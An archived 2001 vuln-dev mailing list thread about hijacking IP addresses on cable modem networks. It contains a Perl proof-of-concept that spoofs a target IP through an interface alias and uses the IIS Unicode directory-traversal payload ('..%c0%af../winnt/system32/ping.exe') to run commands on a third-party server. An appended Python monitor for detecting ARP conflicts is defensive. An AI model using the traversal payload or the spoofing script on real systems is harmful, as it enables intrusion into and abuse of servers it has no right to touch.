Vulnerability Development mailing list archives

Re: Hijack IP Address using cable modem


From: cdowns <cdowns () SKILLSOFT COM>
Date: Wed, 28 Mar 2001 21:32:24 -0500

Patrick Patterson wrote:

-----BEGIN PGP SIGNED MESSAGE-----

I think I see where Patrick was coming from with this:

Victim turns on his computer, and gets an IP address
Cracker, while sniffing the Cable segment notices that IP address foo is
assigned to MAC bar
Cracker changes his own MAC address to bar, and brings up IP address foo on
this new MAC address (some Ethernet cards have overwritable MAC addresses)
Since both Cracker and Victim have the same MAC, Cracker gets all packets
for Victim's computer, and is able to impersonate victim.

This is just a slightly more sophisticated IP Address Spoofing attack.... and
I don't think it will work...

From what I know of Cablemodem networks, there are actually several parts.

1: The cable network - the 'Modem' talks to the Cable Company terminal
equipment and ensures that you are a valid subscriber.
2: The IP Network - the routers keep track of which IP and MAC, is on which
Cable Modem - thus making this attack unlikely to succeed....

I haven't tested this, and might be horribly wrong, but I don't think so -
this is one of those things that looks better in theory than in practice - Is
anyone from @HOME or ATT around to confirm/deny what I've written?

On Wednesday 28 March 2001 09:09, Nick Summy wrote:
Now I hardly know anything about this subject, so correct me if I'm wrong,
but I have a few questions.

<SNIP>

- --

Patrick Patterson                       Tel: +1 514 485-0789
President, Chief Security Architect     Fax: +1 514 485-4737
Carillon Information Security Inc.      E-Mail: ppatterson () carillonis com

- ----------------- The New Sound of Network Security -----------------
                  <<  http://www.carillonis.com  >>

I tried this today on my company LAN and it worked perfectly. Had to do some
adjusting but it worked, so I'm writing a little Perl script right now and it's
almost done.
It will just use a Unicode server to execute the ICMP request to the spoofed
machine; in progress.

# ---------------------------------------------
# This program was inspired by a thread that started on vuln-dev () securityfocus com
# most cable networks have ARP Broadcasts enabled so arp spoofing works on that network
# this is a proof of concept program and is intended for educational purposes only therefore !
# i am not responsible for anything bad or just plain evil done with this program.
# enough said you know the rules.
# -D
use LWP::Simple;
use Getopt::Std;

system ("clear");

# -t, -n, -b and -u all take a value; the posted spec "tnbu:?" only gave -u one,
# so -t/-n/-b were parsed as bare flags and their values were lost.
getopts("t:n:b:u:?", \%args);

if ( $args{t} ) {
    $target = $args{t};
} else {
    Usage();
}
if ( $args{"?"} ){
    Usage();
}
# <---------------------------------------
## this is where we need to create a network alias on the local machine
## for the network target we would like to spoof.
## we will cheat for now and use system calls just for the sake of getting something that works....
if ( $args{n} ) {
    $netmask = $args{n};
}
if ( $args{b} ) {
    $broadcast = $args{b};
}
print "creating network alias .... \n";
sleep 2;
# system call here.
system ("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast $broadcast");
print ("ifconfig eth0:0 interface for spoof... .\n");
print ("----------------------------------------\n");
system ("/sbin/ifconfig eth0:0");

# use uni-code server for icmp to spoofed host.
# <---------------------------------------
if ( $args{u} ) {
    # the posted code never copied -u into a variable, assigned get()'s result to
    # the wrong name and had a stray ";" inside the get() parentheses
    $uni_server = $args{u};
    $uni_test = get("http://$uni_server/scripts/..%c0%af../winnt/system32/ping.exe?+$target");
    print ("reply from $uni_test\n");
}
# <---------------------------------------
sub Usage {
    print <<USAGE;
  Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server>
      -? this menu
      -t <target to spoof>
      -n netmask
      -b broadcast
      -u uni-code server to use
 Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b 192.168.0.255 -u 192.168.20.x
 Note: this program needs to be run as root
USAGE
    exit;
}

-D
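The point Patrick makes in item 2 (the access router knows which IP and MAC sit behind which cable modem, so a cloned MAC or a re-claimed IP showing up elsewhere is detectable) can be turned into a small monitor. The following is an added example written for this archive page, not code from the thread or from -D's script. It assumes a constructed, simplified log format of one ARP reply per line ("seconds port ip is-at mac", with the port being the cable modem or switch port the frame arrived on) and flags the two cases discussed above: an IP answered by a second MAC, and the same MAC+IP pair appearing from a different modem. The binding table is learned from the first reply seen; a real deployment would seed it from DHCP leases or the CMTS registration table instead.

```python
import re
from collections import namedtuple

# Constructed ARP reply log, not real capture data:
# "<seconds> <modem/port> <ip> is-at <mac>", one line per reply seen at the router.
CONSTRUCTED_LOG = """\
0 modem1 10.0.0.5 is-at aa:bb:cc:00:00:01
1 modem1 10.0.0.6 is-at aa:bb:cc:00:00:02
5 modem2 10.0.0.5 is-at aa:bb:cc:00:00:01
6 modem1 10.0.0.6 is-at aa:bb:cc:00:00:99
7 modem1 10.0.0.5 is-at aa:bb:cc:00:00:01
"""

ArpReply = namedtuple("ArpReply", "ts modem ip mac")
Alert = namedtuple("Alert", "ts kind ip mac modem")

LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<modem>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s*$",
    re.IGNORECASE,
)


def parse_log(text):
    """Parse the constructed log format; lines that do not match are skipped."""
    replies = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            replies.append(ArpReply(int(m["ts"]), m["modem"], m["ip"], m["mac"].lower()))
    return replies


def detect_conflicts(replies, known=None):
    """Return Alerts for replies that contradict the learned (ip -> mac, modem) table.

    known: optional seed table {ip: (mac, modem)}, e.g. from DHCP leases; when it is
    empty the first reply for an IP is trusted, which is the weak spot of pure learning.
    """
    ip_binding = dict(known or {})
    alerts = []
    for r in replies:
        if r.ip not in ip_binding:
            ip_binding[r.ip] = (r.mac, r.modem)
            continue
        mac, modem = ip_binding[r.ip]
        if r.mac != mac:
            # a different NIC is answering for an IP we already have a binding for
            alerts.append(Alert(r.ts, "ip-claimed-by-new-mac", r.ip, r.mac, r.modem))
        elif r.modem != modem:
            # same MAC and IP as before, but arriving through another modem/port:
            # the cloned-MAC case from the thread
            alerts.append(Alert(r.ts, "mac-moved-to-other-modem", r.ip, r.mac, r.modem))
    return alerts


if __name__ == "__main__":
    for a in detect_conflicts(parse_log(CONSTRUCTED_LOG)):
        print(f"t={a.ts:>3} {a.kind:<26} ip={a.ip} mac={a.mac} via {a.modem}")
```

Run against the constructed log this reports the reply at t=5 (known MAC and IP arriving via modem2) and the one at t=6 (10.0.0.6 answered by a new MAC); the legitimate repeat at t=7 is silent. Because the detector is keyed on the modem or port as well as the MAC, cloning the victim's MAC does not hide the second source, which is exactly why per-modem tracking makes the attack unlikely to succeed on that kind of network.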

